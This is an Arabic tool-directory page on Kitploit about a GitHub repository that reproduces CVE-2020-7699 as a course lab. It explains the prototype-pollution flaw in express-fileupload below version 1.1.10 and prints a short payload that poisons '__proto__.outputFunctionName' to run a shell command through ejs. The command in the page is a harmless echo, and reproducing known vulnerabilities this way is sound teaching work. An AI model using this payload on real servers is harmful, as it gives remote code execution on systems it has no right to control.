Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-7699_reproduce — إعادة إنتاج CVE-2020-7699، واجب رئيسي لمقرر مبادئ أمن البرمجيات | Kitploit
أدوات/GitHubGitHub/zodiac12-pub/cve-2020-7699_reproduce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHubzodiac12-pub/cve-2020-7699_reproduce

CVE-2020-7699_reproduce

إعادة إنتاج CVE-2020-7699، واجب رئيسي لمقرر مبادئ أمن البرمجيات

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إعادة إنتاج CVE-2020-7699

إعادة إنتاج لثغرة تنفيذ الأوامر عن بُعد (RCE) في Node.js (CVE-2020-7699)، من أعمالي المخبرية

الإعداد

إصدار Node.js: v14.16.1، يرجى التأكد من أن إصدار Node.js هو 14 (الإصدارات الأخرى قد تعمل على الأرجح، لم أختبرها)

إصدار Python: 3.9.5، يُستخدم Python فقط لإرسال طلب الهجوم عبر HTTP، ولا يُشترط إصدار محدد

فقط clone المستودع، ثم npm i لتثبيت التبعيات. لقد وفرت أمرين إضافيين:

  • استخدام npm run start-server لبدء تشغيل الخادم المستهدف (خادم الضحية)
  • استخدام npm run launch-attack لشنّ الهجوم

التحليل

express-fileUpload: الإصدارات الأقل من 1.1.10 ستكون متأثرة

يوجد تلويث للنموذج الأولي (prototype pollution) في express-fileUpload

الثغرة: تلويث النموذج الأولي في express-fileUpload

كيفية استغلالها: تلويث __proto__.outputFunctionName لكتابة الأمر الذي سيتم تنفيذه. مثال: echo "ATTACK SUCCESSFUL" > attacked.txt

root@kitploit:~
exec_command = "echo \"ATTACK SUCCESSFUL\" > attacked.txt"

{
    "__proto__.outputFunctionName": (
        None,
        f"x;process.mainModule.require('child_process').exec('{exec_command}');x"
    )
}

توجد ثغرة RCE في ejs

الثغرة: سيحاول ejs تنفيذ xxx.outputFunctionName وهي undefined، لكن إذا تم تلويث object.outputFunctionName، فسينفّذها بدلاً من ذلك

تنزيل الأداة